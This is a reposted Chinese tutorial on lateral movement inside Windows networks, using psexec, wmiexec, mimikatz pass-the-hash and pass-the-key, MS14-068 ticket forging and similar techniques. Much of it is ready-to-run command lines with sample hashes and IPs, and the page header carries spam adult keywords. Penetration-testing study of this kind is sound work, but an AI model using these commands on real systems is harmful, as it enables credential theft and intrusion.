女人自慰AV免费观看内涵网,日韩国产剧情在线观看网址,神马电影网特片网,最新一级电影欧美,在线观看亚洲欧美日韩,黄色视频在线播放免费观看,ABO涨奶期羡澄,第一导航fulione,美女主播操b

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

基于口令的橫向移動(dòng)進(jìn)行內(nèi)網(wǎng)滲透測(cè)試

jf_Fo0qk3ln ? 來(lái)源:csdn ? 作者:大川兒 ? 2022-11-09 09:30 ? 次閱讀

前言

當(dāng)我們拿下 webshell 后,若其服務(wù)器有內(nèi)網(wǎng)環(huán)境,在進(jìn)一步測(cè)試中就需要進(jìn)行內(nèi)網(wǎng)滲透測(cè)試,對(duì)于內(nèi)網(wǎng)滲透測(cè)試的方法常用的為:基于口令的橫向移動(dòng)和基于漏洞的攻擊。本文主要從基于口令的橫向移動(dòng),自己收集了網(wǎng)上比較主流的方法,但是自己才疏學(xué)淺,有說(shuō)法錯(cuò)誤之處希望大佬們能夠在評(píng)論區(qū)中指出,感激不敬。

一、通過(guò) at&schtasks 進(jìn)行明文傳遞

說(shuō)明:at&schtasks 都是 windows 上創(chuàng)建計(jì)劃任務(wù)的命令,只是針對(duì)的版本不同,at 是 win2008 及一下;

1、前提條件:


1)能夠獲得明文密碼

2)鏈接的目標(biāo)主機(jī)需要administrator權(quán)限,普通權(quán)限不能夠進(jìn)行文件操作(工作組或域)

3)跳板主機(jī)任意權(quán)限

4)可在本地和遠(yuǎn)程執(zhí)行

2、執(zhí)行流程:

1)與目標(biāo)主機(jī)建立IPC鏈接

2)拷貝要執(zhí)行命令的腳本到目標(biāo)主機(jī)

3)查看當(dāng)前時(shí)間,創(chuàng)建計(jì)劃任務(wù)(at&schtasks)

4)刪除IPC鏈接

3、命令語(yǔ)句:(這里的命令語(yǔ)句在下面很多方法中都會(huì)有體現(xiàn),所以下面若有用到該類似方法我將會(huì)簡(jiǎn)寫(xiě))

pYYBAGNrAx-AM9WiAAEs3hupRVU795.jpg

二、、atexec 進(jìn)行明文與HASH傳遞

1、前提條件:


1)能夠獲得明文密碼或密碼hash值

2)目標(biāo)主機(jī)需要連接administrator用戶(工作組或域)

3)跳板主機(jī)任意權(quán)限

4)可在本地和遠(yuǎn)程執(zhí)行

2、命令語(yǔ)句:

poYBAGNrAz6AN0usAAB2_KhtnZY589.jpg

三、SMB 服務(wù)利用

1、psexec 工具傳遞

說(shuō)明:SMB 服務(wù)可以通過(guò)明文或 hash 傳遞進(jìn)行攻擊,需要對(duì)方服務(wù)器 445 端口開(kāi)放。psexec 工具有微軟官方自帶(不用考慮免殺),也有第三方制作(需要考慮免殺)。

前提條件:


1)能夠獲得明文密碼或密碼hash值(官方工具只能使用明文,第三方可以使用hash)

2)通過(guò)psexec工具的話只能在本地反彈shell,但是CS可以輔助我們使用psexec方法,遠(yuǎn)程反彈會(huì)話

3)建立的連接需要連接administrator用戶,普通權(quán)限無(wú)法連接成功

4)跳板機(jī)任意權(quán)限

命令語(yǔ)句:

1)微軟官方工具,只能通過(guò)明文建立

poYBAGNrA2-AakgyAACkxKUqhMk768.jpg

2)第三方工具,可以通過(guò) hash 值建立

pYYBAGNrA4WAGRzyAAB2QqGYMwM740.jpg

3) 通過(guò) CS 進(jìn)行傳遞,該方法我會(huì)在后期說(shuō) CS 的時(shí)候體現(xiàn)出來(lái),比較簡(jiǎn)單,這里就不細(xì)說(shuō)了

2、smbexec 工具傳遞

說(shuō)明:該工具為第三方工具,在實(shí)際情況中需要考慮免殺請(qǐng)況,同時(shí)服務(wù)器需要開(kāi)通 445 端口 前提條件:


1)能夠獲得明文密碼或密碼hash值(官方工具只能使用明文,第三方可以使用hash)

2)只能本地反彈shell,無(wú)法遠(yuǎn)程反彈

3)建立的連接需要連接administrator用戶,普通權(quán)限無(wú)法連接成功

4)跳板機(jī)任意權(quán)限

命令語(yǔ)句:

pYYBAGNrA8KALutbAABlBMjih-A260.jpg

四、WMI 服務(wù)利用

1、wmic 傳遞

說(shuō)明:WMI 服務(wù)需要目標(biāo)服務(wù)器開(kāi)通 135 端口,同時(shí)需要目標(biāo)服務(wù)器明文密碼,該方法不會(huì)在目標(biāo)服務(wù)器中留下日志,但是沒(méi)有回顯

前提條件:


1)獲得明文密碼

2)可在本地和遠(yuǎn)程執(zhí)行

3)需要administrator用戶賬號(hào),普通權(quán)限連接不成功

4)跳板機(jī)任意權(quán)限

命令語(yǔ)句:

1)wmic/node:192.168.89.3/user:administrator/password:123.comprocesscallcreate"cmd.exe/cnetuser>C:1.txt"#工作組

2)wmic/node:192.168.89.3/user:hackeradministrator/password:1qaz@2wsxprocesscallcreate"cmd.exe/cipconfig>C:1.txt"#域內(nèi)

2、cscript 傳遞

說(shuō)明:自帶的 cscript 為明文傳遞,有回顯,但是需要事先傳入 wmiexec.vbs 文件,需要目標(biāo)服務(wù)器開(kāi)啟 135 端口

前提條件:


1)獲得明文密碼

2)只能在本地執(zhí)行

3)需要administrator用戶賬號(hào),普通權(quán)限連接不成功

4)跳板機(jī)任意權(quán)限 命令語(yǔ)句:

1)cscript//nologowmiexec.vbs/shell192.168.89.3administrator123.com#工作組

2)cscript//nologowmiexec.vbs/shell192.168.89.3hackeradministrator123.com#域內(nèi)

3、wmiexec 傳遞

說(shuō)明:wmiexec 為第三方工具,需要注意免殺問(wèn)題,也需要目標(biāo)服務(wù)器開(kāi)啟 135 端口

前提條件:


1)獲取明文密碼或hash值

2)只能在本地執(zhí)行

3)需要administrator用戶賬號(hào),普通權(quán)限連接不成功

4)跳板機(jī)任意權(quán)限 命令語(yǔ)句:

1)wmiexec.exe./administrator:123.com@192.168.89.3"whoami"#工作組明文

2)wmiexec.exehacker/administrator:123.com@192.168.89.3"whoami"#域內(nèi)明文

3)wmiexec.exe-hashes:afffeba176210fad4628f0524bfe1942./administrator@192.168.89.3"whoami"#hash值

五、PTH 橫向傳遞攻擊

說(shuō)明:PTH 攻擊建立在密碼 hash 之上。攻擊系統(tǒng)范圍為 win7win2008r2win2012 等。若系統(tǒng)打了 KB2871997 補(bǔ)丁只能 administrator 連接,沒(méi)有打補(bǔ)丁任何用戶都可以連接

前提條件:


1)獲取密碼hash

2)判斷是否打了補(bǔ)丁--KB2871997

3)跳板機(jī)權(quán)限為管理員權(quán)限

4)可以在本地和遠(yuǎn)程執(zhí)行

5)值得注意的是,普通用戶建立的連接,似乎權(quán)限過(guò)小,很多操作無(wú)法進(jìn)行,所以我判斷普通用戶似乎是無(wú)效的

命令語(yǔ)句:

1)本地執(zhí)行(基于 mimikatz 執(zhí)行)


#基于mimikatz執(zhí)行

1)sekurlsa::pth/user:sql2008/domain:hacker/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#域內(nèi)hash傳遞

2)sekurlsa::pth/user:administrator/domain:workgroup/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#工作組hash

#彈出一個(gè)命令執(zhí)行框,在這個(gè)框中建立了類似的ipc$連接,

#我們可以查看目錄,下載文件,上傳文件,創(chuàng)建計(jì)劃任務(wù)執(zhí)行文件

#如:

dir\sql2008.hacker.comc$

dir\192.168.89.3c$

2)遠(yuǎn)程執(zhí)行(基于 CS 執(zhí)行)


#基于CS執(zhí)行

1)mimikatzsekurlsa::pth/user:administrator/domain:workgroup/ntlm:afffeba176210fad4628f0524bfe1942

2)steal_tokenPID

3)shelldir\192.168.89.3c$

六、PTK 橫向傳遞攻擊

說(shuō)明:PTK 傳遞攻擊針對(duì)的是打了 KB2871997 補(bǔ)丁的,未打補(bǔ)丁是不能用的,這里需要使用 mimikatz 獲取 AES keys,獲取命令為:sekurlsa::ekeys

前提條件:


1)判斷是否打了KB2871997補(bǔ)丁

2)獲取AES密碼

3)跳板機(jī)的管理員權(quán)限

4)能在本地運(yùn)行,遠(yuǎn)程沒(méi)有測(cè)試成功 命令語(yǔ)句為:

1)mimikatz.exe"sekurlsa::ekeys"#獲取aes

2)sekurlsa::pth/user:sql2008/domain:hacker/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

七、PTT攻擊

1、說(shuō)明:PTT 攻擊是利用 Kerberos 協(xié)議進(jìn)行攻擊的,常用的攻擊手法有:MS14-068,Golden ticket,SILVER ticket。它是將連接合法的票據(jù)注入到內(nèi)存中實(shí)現(xiàn)連接。 MS14-068 造成的危害是允許域內(nèi)任何一個(gè)普通用戶,將自己提升至域管權(quán)限。微軟給出的補(bǔ)丁是 kb3011780

2、前提條件:

1)利用ms14-068、kekeo、本地票據(jù)在本地測(cè)試成功,

2)利用ms14-068、kekeo跳板機(jī)本地連接時(shí)可以是任意權(quán)限

3)利用ms14-068需要知道域內(nèi)某用戶的賬號(hào)及明文密碼

4)kekeo需要知道域內(nèi)用戶名與hash值

5)本地票據(jù)需要管理員權(quán)限(mimikatz導(dǎo)出票據(jù)需要高權(quán)限)

1)利用ms14-068遠(yuǎn)程連接需要管理員權(quán)限

3、命令語(yǔ)句:

1)利用 ms14-068


#1)本地連接

1)WMICuseraccountgetname,sid#sid獲取,管理員權(quán)限獲取的更多一點(diǎn)

2)ms14-068.exe-u域成員名@域名-ssid(域成員)-d域控制器地址-p域成員密碼(生成TGT)

3)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com

4)mimikatz.exe"kerberos::ptcTGT_mary@god.org.ccache"#(TGT票據(jù)注入)

5)dir\DC.hacker.comc$(注意要用域內(nèi)域名連接,這里其實(shí)是類似建立了一條IPC$連接)

#2)遠(yuǎn)程連接,在CS中執(zhí)行

1)WMICuseraccountgetname,sid//sid獲取

2)mimikatzkerberos::list//列出當(dāng)前票據(jù)

3)mimikatzkerberos::purge//清除票據(jù)

4)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com//生成tgt票據(jù)

5)mimikatzkerberos::ptcTGT_web07@hacker.com.ccache//導(dǎo)入票據(jù)

6)shelldir\sql2008.hacker.com//利用

2)利用工具 kekeo(未成功)


1)ekeo"tgt::ask/user:mary/domain:god.org/ntlm:518b98ad4178a53695dc997aa02d455c"#生成票據(jù)

2)kerberos::pttTGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi#導(dǎo)入票據(jù)

4)dir\DC.hacker.comc$#利用

八、RDP 傳遞攻擊 (測(cè)試失敗)

1、說(shuō)明:RDP 傳遞其實(shí)就是利用了遠(yuǎn)程桌面功能

2、前提條件:


1)獲得對(duì)方賬戶明文或hash(用戶需要是能夠有遠(yuǎn)程桌面連接權(quán)限)

2)本地執(zhí)行

3)跳板機(jī)任意權(quán)限

3、命令語(yǔ)句:

sekurlsa::pth/user:administrator/domain:hacker.com/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d"/run:mstsc.exe/restrictedadmin"

總結(jié)

上述方法自己在本地搭建了靶場(chǎng)進(jìn)行測(cè)試,可能有很多外在因數(shù)是自己沒(méi)有考慮到的,所以可能會(huì)存在錯(cuò)誤,歡迎各位大佬批評(píng)指正。





審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • WINDOWS
    +關(guān)注

    關(guān)注

    4

    文章

    3606

    瀏覽量

    90891
  • Hash
    +關(guān)注

    關(guān)注

    0

    文章

    32

    瀏覽量

    13433
  • SMB
    SMB
    +關(guān)注

    關(guān)注

    0

    文章

    41

    瀏覽量

    11894

原文標(biāo)題:內(nèi)網(wǎng)橫向移動(dòng)常用方法總結(jié)(附工具)

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    如何清除主板BIOS的口令?

    如何清除主板BIOS的口令?   為了保護(hù)計(jì)算機(jī)的資源和安全,可以為其加上開(kāi)機(jī)密碼。但是一旦不小心將密碼忘記,就會(huì)致使計(jì)算機(jī)不能進(jìn)入BIOS設(shè)置,或者不能啟動(dòng)計(jì)算機(jī)。  1.可先
    發(fā)表于 01-05 15:38

    請(qǐng)問(wèn)花生殼怎么進(jìn)行內(nèi)網(wǎng)穿透的?

    花生殼是怎么進(jìn)行內(nèi)網(wǎng)穿透的,能不能用來(lái)***,還是只有組建內(nèi)網(wǎng)的功能。
    發(fā)表于 04-18 06:02

    內(nèi)網(wǎng)穿透詳解-基于NATAPP&NatAssist測(cè)試

    ://natapp.cn)的客戶端進(jìn)行內(nèi)網(wǎng)穿透的,使用非常方便,進(jìn)而單獨(dú)調(diào)通4G模塊與內(nèi)網(wǎng)服務(wù)器的通信。【內(nèi)網(wǎng)穿透】本質(zhì)為NAT(Net Address Translation)網(wǎng)絡(luò)地址轉(zhuǎn)換,即通過(guò)
    發(fā)表于 09-13 12:14

    web滲透測(cè)試流程

    不需要)  漏洞利用:當(dāng)我們拿到了該網(wǎng)站存在漏洞之后,就可以進(jìn)一步拿到網(wǎng)站的webshell。  內(nèi)網(wǎng)轉(zhuǎn)發(fā):如果我們還想進(jìn)一步的探測(cè)內(nèi)網(wǎng)主機(jī)的信息的話,我們就需要進(jìn)行內(nèi)網(wǎng)轉(zhuǎn)發(fā)了。  內(nèi)網(wǎng)
    發(fā)表于 01-29 17:27

    WEB安全滲透測(cè)試流程到底是什么

    對(duì)系統(tǒng)的任何弱點(diǎn)、技術(shù)缺陷或漏洞的主動(dòng)分析,這個(gè)分析是從一個(gè)攻擊者可能存在的位置來(lái)進(jìn)行的,并且從這個(gè)位置有條件主動(dòng)利用安全漏洞。換句話來(lái)說(shuō),滲透測(cè)試是指滲透人員在不同的位置(比如從
    的頭像 發(fā)表于 02-20 13:59 ?3275次閱讀

    四個(gè)方法探測(cè)服務(wù)器的內(nèi)網(wǎng)存活主機(jī)

    滲透中,當(dāng)我們拿下一臺(tái)服務(wù)器作為跳板機(jī)進(jìn)一步進(jìn)行內(nèi)網(wǎng)滲透時(shí),往往需要通過(guò)主機(jī)存活探測(cè)和端口掃描來(lái)收集內(nèi)網(wǎng)資產(chǎn)。
    的頭像 發(fā)表于 09-27 15:18 ?1.4w次閱讀
    四個(gè)方法探測(cè)服務(wù)器的<b class='flag-5'>內(nèi)網(wǎng)</b>存活主機(jī)

    內(nèi)網(wǎng)滲透:獲取Windows內(nèi)Hash密碼的方法

    內(nèi)網(wǎng)滲透中,當(dāng)攻擊者獲取到內(nèi)網(wǎng)某臺(tái)機(jī)器的控制權(quán)后,會(huì)議被攻陷的主機(jī)為跳板,通過(guò)收集域內(nèi)憑證等各種方法,訪問(wèn)域內(nèi)其他機(jī)器,進(jìn)一步擴(kuò)大資產(chǎn)范圍。
    的頭像 發(fā)表于 12-24 16:01 ?1128次閱讀

    內(nèi)網(wǎng)環(huán)境下的滲透測(cè)試

    我們總是先通過(guò)對(duì)外提供服務(wù)的,防守最薄弱的主機(jī)打進(jìn)去,然后搭建隧道,通過(guò)該主機(jī)訪問(wèn)內(nèi)部的其他主機(jī)。快速橫向移動(dòng)到到內(nèi)網(wǎng)中的核心資產(chǎn),獲取核心敏感數(shù)據(jù)和權(quán)限,完成一次疼痛的打擊。
    的頭像 發(fā)表于 09-14 09:36 ?2011次閱讀

    白盒滲透測(cè)試的優(yōu)勢(shì)是什么

    滲透測(cè)試是一項(xiàng)重要的進(jìn)攻性安全演習(xí)或操作。如果執(zhí)行得當(dāng),它會(huì)極大地提高您組織的安全性。滲透測(cè)試分為三種類型,根據(jù)滲透
    的頭像 發(fā)表于 09-19 10:04 ?1398次閱讀

    APK滲透測(cè)試工具:AppMessenger

    APK滲透測(cè)試工具:AppMessenger,一款適用于以APP病毒分析、APP漏洞挖掘、APP開(kāi)發(fā)、HW行動(dòng)/紅隊(duì)/滲透測(cè)試團(tuán)隊(duì)為場(chǎng)景的移動(dòng)
    的頭像 發(fā)表于 11-18 09:32 ?3191次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具SweetBabyScan

    輕量級(jí)內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具:SweetBabyScan,是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具,集成了Xray與Nuclei的Poc
    的頭像 發(fā)表于 12-02 09:23 ?5761次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具

    甜心寶貝是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具,集成了Xray與Nuclei的Poc。
    的頭像 發(fā)表于 12-14 09:48 ?4280次閱讀

    記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

    最近在客戶現(xiàn)場(chǎng)對(duì)內(nèi)網(wǎng)服務(wù)器進(jìn)行滲透測(cè)試,發(fā)現(xiàn)了大量的弱口令,本次歷程就是從這里開(kāi)始。
    的頭像 發(fā)表于 03-07 09:30 ?1364次閱讀

    如何使用DudeSuite進(jìn)行滲透測(cè)試工作

    技術(shù)的理解使用DudeSuite進(jìn)行滲透測(cè)試工作,半自動(dòng)Web滲透測(cè)試就目前的來(lái)說(shuō)依然是主流,相比起全自動(dòng)化的掃描器及批量化腳本可以在
    的頭像 發(fā)表于 06-13 09:04 ?2084次閱讀
    如何使用DudeSuite<b class='flag-5'>進(jìn)行</b><b class='flag-5'>滲透</b><b class='flag-5'>測(cè)試</b>工作

    內(nèi)網(wǎng)穿透工具的種類、原理和使用方法

    本文以滲透的視角,總結(jié)幾種個(gè)人常用的內(nèi)網(wǎng)穿透,內(nèi)網(wǎng)代理工具,介紹其簡(jiǎn)單原理和使用方法。
    的頭像 發(fā)表于 08-25 10:35 ?3329次閱讀
    <b class='flag-5'>內(nèi)網(wǎng)</b>穿透工具的種類、原理和使用方法